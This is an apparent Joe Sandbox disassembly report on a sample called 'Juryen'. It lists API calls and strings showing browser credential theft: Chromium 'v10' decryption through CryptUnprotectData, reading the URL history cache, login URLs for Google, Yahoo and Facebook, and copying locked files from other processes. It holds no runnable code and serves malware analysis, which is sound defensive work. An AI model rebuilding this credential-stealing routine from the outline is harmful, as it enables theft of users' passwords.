                                                                    • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                    • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
Control-flow Graph (image only; no node data extracted)
                                                                    APIs
                                                                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                    • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                    • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                    • String ID: $/deleteregkey$/savelangfile
                                                                    • API String ID: 2744995895-28296030
                                                                    • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                    • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
Control-flow Graph (image only; no node data extracted)
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040B71C
                                                                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                    • wcsrchr.MSVCRT ref: 0040B738
                                                                    • memset.MSVCRT ref: 0040B756
                                                                    • memset.MSVCRT ref: 0040B7F5
                                                                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                    • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                    • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                    • memset.MSVCRT ref: 0040B851
                                                                    • memset.MSVCRT ref: 0040B8CA
                                                                    • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                    • memset.MSVCRT ref: 0040BB53
                                                                    • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                    • String ID: chp$v10
                                                                    • API String ID: 1297422669-2783969131
                                                                    • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                    • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                    Control-flow Graph

                                                                    (control-flow graph of the function at 004091B8 not reproduced; rendered graph data omitted)
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004091E2
                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                    • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                    • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                    • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                    • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                    • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                    • String ID:
                                                                    • API String ID: 3715365532-3916222277
                                                                    • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                    • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                      • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                    • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                    • String ID: bhv
                                                                    • API String ID: 4234240956-2689659898
                                                                    • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                    • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                    Control-flow Graph

                                                                    (control-flow graph of the function at 00413F4F not reproduced; rendered graph data omitted)
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                    • API String ID: 2941347001-70141382
                                                                    • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                    • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040C298
                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                    • wcschr.MSVCRT ref: 0040C324
                                                                    • wcschr.MSVCRT ref: 0040C344
                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                    • GetLastError.KERNEL32 ref: 0040C373
                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                    • String ID: visited:
                                                                    • API String ID: 2470578098-1702587658
                                                                    • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                    • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                    Control-flow Graph

                                                                    (control-flow graph of the function at 0040E175 not reproduced; rendered graph data omitted)
                                                                    APIs
                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                    • memset.MSVCRT ref: 0040E1BD
                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                    • free.MSVCRT ref: 0040E28B
                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                    • _snwprintf.MSVCRT ref: 0040E257
                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                    • API String ID: 2804212203-2982631422
                                                                    • Opcode ID: 30b20afd110d2fca300a1e6f1181ee72335b5a4e82da81a5fff2aa0aaab9b1e7
                                                                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                    • Opcode Fuzzy Hash: 30b20afd110d2fca300a1e6f1181ee72335b5a4e82da81a5fff2aa0aaab9b1e7
                                                                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                    • memset.MSVCRT ref: 0040BC75
                                                                    • memset.MSVCRT ref: 0040BC8C
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                    • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                    • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                    • String ID:
                                                                    • API String ID: 115830560-3916222277
                                                                    • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                    • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                    • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                    • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                    Control-flow Graph (rendered graph of executed and not-executed basic blocks for the function at 0041837F; figure omitted)
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                    • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                    • GetLastError.KERNEL32 ref: 0041847E
                                                                    • free.MSVCRT ref: 0041848B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile$ErrorLastfree
                                                                    • String ID: |A
                                                                    • API String ID: 77810686-1717621600
                                                                    • Opcode ID: cddcad6bce7e241d28976a522cb323b7bed0449e87b005469fdf17cb4ba43f93
                                                                    • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                    • Opcode Fuzzy Hash: cddcad6bce7e241d28976a522cb323b7bed0449e87b005469fdf17cb4ba43f93
                                                                    • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.MSVCRT ref: 0041249C
                                                                    • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                    • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                    • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                    • wcscpy.MSVCRT ref: 004125A0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                    • String ID: r!A
                                                                    • API String ID: 2791114272-628097481
                                                                    • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                    • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                    • _wcslwr.MSVCRT ref: 0040C817
                                                                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                    • wcslen.MSVCRT ref: 0040C82C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                    • API String ID: 2936932814-4196376884
                                                                    • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                    • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040A824
                                                                    • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                    • wcscpy.MSVCRT ref: 0040A854
                                                                    • wcscat.MSVCRT ref: 0040A86A
                                                                    • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                    • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                    • String ID: C:\Windows\system32
                                                                    • API String ID: 669240632-2896066436
